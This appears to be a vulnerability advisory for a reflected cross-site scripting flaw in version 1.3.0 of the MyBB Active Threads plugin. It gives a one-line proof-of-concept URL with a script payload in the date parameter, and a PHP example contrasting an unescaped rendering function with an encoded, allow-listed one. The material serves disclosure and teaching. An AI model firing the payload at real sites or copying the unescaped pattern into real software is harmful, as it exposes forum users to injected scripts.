MyBB Active Threads 1.3.0 Cross Site Scripting
MyBB Active Threads plugin version 1.3.0 suffers from a cross site scripting vulnerability.
# Exploit Title: MyBB Active Threads Plugin 1.3.0 – Cross-Site Scripting
# Date: February 9, 2022
# Author: 0xB9
# Twitter: @0xB9sec
# Software Link: https://community.mybb.com/mods.php?action=view&pid=1336
# Version: 1.3.0
# Tested On: Windows 10
# CVE: CVE-2022-28354

Description:
This plugin shows a page of active threads. The date parameter is vulnerable to XSS when setting a time period.

Proof of Concept:
activethreads.php?days=7&hours=0&mins=0&date="><script>alert(1)</script>
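The reflected pattern described above next to its output-encoded form, as an added example that is not the plugin's source code. It assumes the date value is echoed into a double-quoted HTML attribute (which the leading "> in the proof of concept suggests); the function names, the input field markup and the allow-list values are hypothetical.

```php
<?php
// Added illustration; NOT the Active Threads plugin's source.
// Assumption: 'date' is reflected into a double-quoted HTML attribute.

// Vulnerable pattern: the request value is concatenated into markup as-is,
// so a double quote in the value ends the attribute and the rest is parsed as HTML.
function render_date_field_vulnerable(string $date): string
{
    return '<input type="text" name="date" value="' . $date . '" />';
}

// Hardened pattern: encode for the HTML attribute context at output time.
// ENT_QUOTES encodes both quote styles; ENT_SUBSTITUTE replaces invalid
// UTF-8 sequences instead of returning an empty string.
function render_date_field_hardened(string $date): string
{
    $safe = htmlspecialchars($date, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="date" value="' . $safe . '" />';
}

// Defence in depth: accept only values the page is known to use and fall
// back to a default otherwise. The allow-list passed in below is hypothetical.
function normalize_date(string $date, array $allowed, string $default): string
{
    return in_array($date, $allowed, true) ? $date : $default;
}

// The value of the date parameter from the proof of concept on this page.
$input = '"><script>alert(1)</script>';

// Unencoded: the markup in the value becomes part of the page.
echo render_date_field_vulnerable($input), "\n";

// Encoded: the value stays inside the attribute as inert text
// (&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;).
echo render_date_field_hardened($input), "\n";

// Validated first, then encoded: an unexpected value is replaced by the default.
$allowed = ['lastpost', 'dateline'];   // hypothetical expected values
echo render_date_field_hardened(normalize_date($input, $allowed, 'lastpost')), "\n";
```

Within MyBB itself, the core helper htmlspecialchars_uni() performs this kind of output encoding for <, >, & and double quotes.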
Related news
CVE-2022-28354: Extend MyBB - Error
In the Active Threads Plugin 1.3.0 for MyBB, the activethreads.php date parameter is vulnerable to XSS when setting a time period.